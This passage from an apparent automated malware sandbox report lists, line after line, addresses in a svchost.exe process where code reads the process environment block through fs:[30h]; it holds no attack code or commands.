            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h]2_2_03C0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]2_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03BBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]2_2_03BBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]2_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]2_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]2_2_03B62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]2_2_03B4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]2_2_03B6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]2_2_03B64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]2_2_03B325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]2_2_03B365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
